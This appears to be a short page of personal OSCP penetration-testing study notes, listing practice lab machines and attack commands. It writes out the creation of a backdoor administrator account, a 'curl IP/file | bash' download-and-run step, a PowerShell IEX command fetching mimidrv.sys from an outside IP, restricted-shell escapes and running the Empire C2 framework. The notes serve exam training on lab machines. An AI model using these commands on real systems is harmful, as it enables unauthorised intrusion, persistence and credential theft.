Notes

God notes

PG boxes on OSCP:

https://defaultcredentials.com/oscp/best-active-directory-practice-for-oscp/

Heist, Hutch, Vault in PG Practice,Resourced

HTB:

APT, Fuse, Cascade, Monterverde,Resolute,Forest, Arkham, Active, Mantis

Cyber Seclabs:

zero, Secret,Brute, Dictionary, Roast, Spray, Sync, Toast

Always look for config files if you have access to application files!

adds an admini account to the hosts

Try legion script for nmap scanning!

always do nmap -sC (default scripts)

If you are a service account you can create an admin account. 

net user gori | passwd123! /add; net localgroup administrators gori /add

evil-winrm -i IP -u gori -p 'passwd123!' to login as the account you just created

net user gori to check priv

---

/etc/apache2 ;look for config files

linux enum

ldd --version

Transfer module

curl IP/file_name | bash (to execute it)

cat /etc/lsb-release

Transfer method

python -m SimpleHTTPserver 80

-> curl -o outputfile IP/filename

Restricted shell? Try this:

ssh mindy@10.129.29.189 -t "bash --noprofile" 

hacker@ahoafhoaf:~$ BASH_CMDS[a]=/bin/sh;a 

$ /bin/bash
bash: groups: command not found
hacker@ahoafhoaf:~$ export PATH=$PATH:/bin/
hacker@ahoafhoaf:~$ export PATH=$PATH:/usr/bin

---

Run sudo 

IEX(New-Object Net.WebClient).downloadString('http://192.168.119.146:8080/mimidrv.sys')

docker run -it --name empire -v empire-data:/opt/Empire/data \
 -p 443:443 --entrypoint bash empireproject/empire
PreviousOracle exploitation:Nextdefault credentials

Last updated